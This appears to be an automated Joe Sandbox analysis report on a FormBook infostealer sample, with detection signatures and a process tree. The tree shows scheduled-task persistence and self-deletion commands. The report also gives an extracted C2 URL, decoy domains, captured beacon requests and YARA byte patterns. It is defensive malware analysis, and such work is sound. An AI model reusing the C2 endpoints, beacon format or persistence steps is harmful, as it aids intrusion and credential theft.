Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report PO07262021.exe

Overview

General Information

Sample Name:PO07262021.exe
Analysis ID:458795
MD5:47a679ec6799a5a2c9212de73d404a83
SHA1:d21c87a07b4701ddf3206aeb534d010dd928116b
SHA256:c2e765b8a42432e042da5c444bdba20b8021bd5e1b022693978b6540fdbddec7
Tags:exeFormbook
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
.NET source code contains very large strings
C2 URLs / IPs found in malware configuration
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Uses schtasks.exe or at.exe to add and modify task schedules
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to launch a process as a different user
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • PO07262021.exe (PID: 6688 cmdline: 'C:\Users\user\Desktop\PO07262021.exe' MD5: 47A679EC6799A5A2C9212DE73D404A83)
    • schtasks.exe (PID: 960 cmdline: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\FzGSUpCvLNF' /XML 'C:\Users\user\AppData\Local\Temp\tmpB7D9.tmp' MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 2388 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • PO07262021.exe (PID: 4780 cmdline: C:\Users\user\Desktop\PO07262021.exe MD5: 47A679EC6799A5A2C9212DE73D404A83)
      • explorer.exe (PID: 3424 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • cmd.exe (PID: 7024 cmdline: C:\Windows\SysWOW64\cmd.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • cmd.exe (PID: 6808 cmdline: /c del 'C:\Users\user\Desktop\PO07262021.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6812 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.cryptoinhindi.online/nmks/"], "decoy": ["sunaoto.net", "uddeshyaheen.com", "memesyndicste.com", "wellnessbytanyabawa.com", "winabeel.com", "santabirria.com", "whatmattersindia.com", "3rdimultimedia.com", "koukismile.com", "hellobabymoccs.com", "marziehmakeup.com", "faiyou.com", "redbarnprovisions.com", "odmgl.com", "usevino.xyz", "csyczp.com", "gutfeelings.club", "coscos.xyz", "moodoo.icu", "thedarktechnician.com", "weebwrld.com", "wilsonmantels.com", "biodrains.com", "banqutstaff.com", "solomonislandsforum.com", "yolo-wear.com", "everylastdropinc.com", "dayblindstarstrategies.com", "freelancersarabia.com", "bellasnicolejewelrymd.com", "oscarh.net", "actevate.xyz", "apa168.com", "paintonpurposeofficial.com", "hrvatskepraviceblog.com", "tednme.com", "truverity.study", "militarynotary.com", "advancedhorticulture.com", "bookmyfreelancer.online", "nieght.com", "yabancidiziozetleri.net", "bkoclchain.com", "ahwaday.com", "yandex-deliverry.online", "electronichaven.today", "islamidesign.com", "lagerungen.com", "uneducatedbyamerica.com", "78500605.xyz", "taichiforwellbeingonline.com", "philipsima.com", "ezljdah.com", "auserconsulting.com", "finrowacademy.com", "securitybyicon.com", "craveroots.com", "ppneumatic.com", "neiretec.com", "amazonemea.xyz", "3dpraclabs-virtual-physics.com", "fitnesstrainingco.com", "brsconsortuimltd.com", "rapiddist.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000F.00000002.912674126.0000000003A00000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    0000000F.00000002.912674126.0000000003A00000.00000004.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    0000000F.00000002.912674126.0000000003A00000.00000004.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x18409:$sqlite3step: 68 34 1C 7B E1
    • 0x1851c:$sqlite3step: 68 34 1C 7B E1
    • 0x18438:$sqlite3text: 68 38 2A 90 C5
    • 0x1855d:$sqlite3text: 68 38 2A 90 C5
    • 0x1844b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x18573:$sqlite3blob: 68 53 D8 7F 8C
    00000007.00000002.765614509.0000000000400000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000007.00000002.765614509.0000000000400000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 13 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      7.2.PO07262021.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        7.2.PO07262021.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        7.2.PO07262021.exe.400000.0.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x18409:$sqlite3step: 68 34 1C 7B E1
        • 0x1851c:$sqlite3step: 68 34 1C 7B E1
        • 0x18438:$sqlite3text: 68 38 2A 90 C5
        • 0x1855d:$sqlite3text: 68 38 2A 90 C5
        • 0x1844b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x18573:$sqlite3blob: 68 53 D8 7F 8C
        7.2.PO07262021.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          7.2.PO07262021.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8d62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x14885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x14371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x14987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x14aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x977a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x135ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa473:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1a527:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1b52a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 1 entries

          Sigma Overview

          No Sigma rule has matched

          Jbx Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 0000000F.00000002.912674126.0000000003A00000.00000004.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.cryptoinhindi.online/nmks/"], "decoy": ["sunaoto.net", "uddeshyaheen.com", "memesyndicste.com", "wellnessbytanyabawa.com", "winabeel.com", "santabirria.com", "whatmattersindia.com", "3rdimultimedia.com", "koukismile.com", "hellobabymoccs.com", "marziehmakeup.com", "faiyou.com", "redbarnprovisions.com", "odmgl.com", "usevino.xyz", "csyczp.com", "gutfeelings.club", "coscos.xyz", "moodoo.icu", "thedarktechnician.com", "weebwrld.com", "wilsonmantels.com", "biodrains.com", "banqutstaff.com", "solomonislandsforum.com", "yolo-wear.com", "everylastdropinc.com", "dayblindstarstrategies.com", "freelancersarabia.com", "bellasnicolejewelrymd.com", "oscarh.net", "actevate.xyz", "apa168.com", "paintonpurposeofficial.com", "hrvatskepraviceblog.com", "tednme.com", "truverity.study", "militarynotary.com", "advancedhorticulture.com", "bookmyfreelancer.online", "nieght.com", "yabancidiziozetleri.net", "bkoclchain.com", "ahwaday.com", "yandex-deliverry.online", "electronichaven.today", "islamidesign.com", "lagerungen.com", "uneducatedbyamerica.com", "78500605.xyz", "taichiforwellbeingonline.com", "philipsima.com", "ezljdah.com", "auserconsulting.com", "finrowacademy.com", "securitybyicon.com", "craveroots.com", "ppneumatic.com", "neiretec.com", "amazonemea.xyz", "3dpraclabs-virtual-physics.com", "fitnesstrainingco.com", "brsconsortuimltd.com", "rapiddist.com"]}
          Multi AV Scanner detection for dropped fileShow sources
          Source: C:\Users\user\AppData\Roaming\FzGSUpCvLNF.exeReversingLabs: Detection: 73%
          Multi AV Scanner detection for submitted fileShow sources
          Source: PO07262021.exeVirustotal: Detection: 58%Perma Link
          Source: PO07262021.exeReversingLabs: Detection: 73%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 7.2.PO07262021.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.PO07262021.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000F.00000002.912674126.0000000003A00000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.765614509.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.767554983.0000000001150000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.767309184.0000000000D00000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.912452970.00000000033D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.911713317.0000000001050000.00000040.00000001.sdmp, type: MEMORY
          Machine Learning detection for dropped fileShow sources
          Source: C:\Users\user\AppData\Roaming\FzGSUpCvLNF.exeJoe Sandbox ML: detected
          Machine Learning detection for sampleShow sources
          Source: PO07262021.exeJoe Sandbox ML: detected
          Source: 7.2.PO07262021.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: PO07262021.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: PO07262021.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000009.00000000.752806137.0000000005A00000.00000002.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: PO07262021.exe, 00000007.00000002.767621920.0000000001190000.00000040.00000001.sdmp, cmd.exe, 0000000F.00000002.912990654.0000000003B5F000.00000040.00000001.sdmp
          Source: Binary string: cmd.pdbUGP source: PO07262021.exe, 00000007.00000002.768387188.00000000014E0000.00000040.00000001.sdmp, cmd.exe, 0000000F.00000000.765256590.00000000011D0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: PO07262021.exe, 00000007.00000002.767621920.0000000001190000.00000040.00000001.sdmp, cmd.exe
          Source: Binary string: cmd.pdb source: PO07262021.exe, 00000007.00000002.768387188.00000000014E0000.00000040.00000001.sdmp, cmd.exe
          Source: Binary string: wscui.pdb source: explorer.exe, 00000009.00000000.752806137.0000000005A00000.00000002.00000001.sdmp
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_011F31DC FindFirstFileW,FindNextFileW,FindClose,15_2_011F31DC
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_011D85EA memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,15_2_011D85EA
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_011E245C FindFirstFileW,FindClose,memcpy,_wcsnicmp,_wcsicmp,memmove,15_2_011E245C
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_011DB89C GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPAX@Z,FindNextFileW,SetLastError,??_V@YAXPAX@Z,GetLastError,FindClose,15_2_011DB89C
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_011E68BA FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,FindNextFileW,FindClose,GetLastError,FindClose,15_2_011E68BA
          Source: C:\Users\user\Desktop\PO07262021.exeCode function: 4x nop then pop ebx7_2_00407AFE

          Networking:

          barindex
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.cryptoinhindi.online/nmks/
          Source: global trafficHTTP traffic detected: GET /nmks/?6latBtaX=AODdElP/LvmD82bfBWBMQGTCd+0C8NCj5PjqI400wXLHipc47/wHi7nKSi/3AqembaQc&v2M=nRRXGl0p HTTP/1.1Host: www.winabeel.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /nmks/?6latBtaX=AODdElP/LvmD82bfBWBMQGTCd+0C8NCj5PjqI400wXLHipc47/wHi7nKSi/3AqembaQc&v2M=nRRXGl0p HTTP/1.1Host: www.winabeel.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.winabeel.com
          Source: explorer.exe, 00000009.00000000.724367987.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: PO07262021.exeString found in binary or memory: http://i.imgur.com/blkrqBo.gif
          Source: explorer.exe, 00000009.00000000.735427722.0000000002B50000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
          Source: explorer.exe, 00000009.00000000.724367987.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000009.00000000.724367987.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000009.00000000.724367987.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000009.00000000.724367987.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 00000009.00000000.724367987.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 00000009.00000000.724367987.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: explorer.exe, 00000009.00000000.724367987.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
          Source: explorer.exe, 00000009.00000000.724367987.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 00000009.00000000.724367987.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 00000009.00000000.724367987.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 00000009.00000000.724367987.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 00000009.00000000.724367987.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 00000009.00000000.724367987.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 00000009.00000000.724367987.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: PO07262021.exe, 00000000.00000003.647203244.000000000116D000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cnD
          Source: explorer.exe, 00000009.00000000.724367987.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 00000009.00000000.724367987.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 00000009.00000000.724367987.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000009.00000000.724367987.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 00000009.00000000.724367987.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 00000009.00000000.724367987.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 00000009.00000000.724367987.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000009.00000000.724367987.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 00000009.00000000.724367987.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000009.00000000.724367987.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000009.00000000.724367987.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: PO07262021.exeString found in binary or memory: https://static.hummingbird.me/anime/poster_images/000/010/716/large/0fd8df1b586e60a0b1591cd8555c072f

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 7.2.PO07262021.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.PO07262021.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000F.00000002.912674126.0000000003A00000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.765614509.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.767554983.0000000001150000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.767309184.0000000000D00000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.912452970.00000000033D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.911713317.0000000001050000.00000040.00000001.sdmp, type: MEMORY

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 7.2.PO07262021.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 7.2.PO07262021.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 7.2.PO07262021.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 7.2.PO07262021.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000F.00000002.912674126.0000000003A00000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000F.00000002.912674126.0000000003A00000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.765614509.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.765614509.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.767554983.0000000001150000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.767554983.0000000001150000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.767309184.0000000000D00000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.767309184.0000000000D00000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000F.00000002.912452970.00000000033D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000F.00000002.912452970.00000000033D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000F.00000002.911713317.0000000001050000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000F.00000002.911713317.0000000001050000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          .NET source code contains very large stringsShow sources
          Source: PO07262021.exe, Lens.csLong String: Length: 10292
          Source: C:\Users\user\Desktop\PO07262021.exeCode function: 7_2_00419D60 NtCreateFile,7_2_00419D60
          Source: C:\Users\user\Desktop\PO07262021.exeCode function: 7_2_00419E10 NtReadFile,7_2_00419E10
          Source: C:\Users\user\Desktop\PO07262021.exeCode function: 7_2_00419E90 NtClose,7_2_00419E90
          Source: C:\Users\user\Desktop\PO07262021.exeCode function: 7_2_00419F40 NtAllocateVirtualMemory,7_2_00419F40
          Source: C:\Users\user\Desktop\PO07262021.exeCode function: 7_2_00419E8B NtClose,7_2_00419E8B
          Source: C:\Users\user\Desktop\PO07262021.exeCode function: 7_2_00419F3D NtAllocateVirtualMemory,7_2_00419F3D
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_011F6D90 EnterCriticalSection,LeaveCriticalSection,fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer,15_2_011F6D90
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_011FB5E0 SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memcpy,memcpy,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW,15_2_011FB5E0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_011DB42E NtOpenThreadToken,NtOpenProcessToken,NtClose,15_2_011DB42E
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_011D84BE NtQueryVolumeInformationFile,GetFileInformationByHandleEx,15_2_011D84BE
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_011D58A4 _setjmp3,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,longjmp,15_2_011D58A4
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_011DB4C0 NtQueryInformationToken,15_2_011DB4C0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_011DB4F8 NtQueryInformationToken,NtQueryInformationToken,15_2_011DB4F8
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_011D83F2 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,DeleteFileW,GetLastError,15_2_011D83F2
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_011F9AB4 NtSetInformationFile,15_2_011F9AB4
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AA9780 NtMapViewOfSection,LdrInitializeThunk,15_2_03AA9780
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AA9FE0 NtCreateMutant,LdrInitializeThunk,15_2_03AA9FE0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AA9710 NtQueryInformationToken,LdrInitializeThunk,15_2_03AA9710
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AA96E0 NtFreeVirtualMemory,LdrInitializeThunk,15_2_03AA96E0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AA96D0 NtCreateKey,LdrInitializeThunk,15_2_03AA96D0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AA9A50 NtCreateFile,LdrInitializeThunk,15_2_03AA9A50
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AA99A0 NtCreateSection,LdrInitializeThunk,15_2_03AA99A0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AA95D0 NtClose,LdrInitializeThunk,15_2_03AA95D0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AA9910 NtAdjustPrivilegesToken,LdrInitializeThunk,15_2_03AA9910
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AA9540 NtReadFile,LdrInitializeThunk,15_2_03AA9540
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AA9860 NtQuerySystemInformation,LdrInitializeThunk,15_2_03AA9860
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AA9840 NtDelayExecution,LdrInitializeThunk,15_2_03AA9840
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AA97A0 NtUnmapViewOfSection,15_2_03AA97A0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AAA3B0 NtGetContextThread,15_2_03AAA3B0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AA9730 NtQueryVirtualMemory,15_2_03AA9730
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AA9B00 NtSetValueKey,15_2_03AA9B00
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AAA710 NtOpenProcessToken,15_2_03AAA710
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AA9760 NtOpenProcess,15_2_03AA9760
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AA9770 NtSetInformationFile,15_2_03AA9770
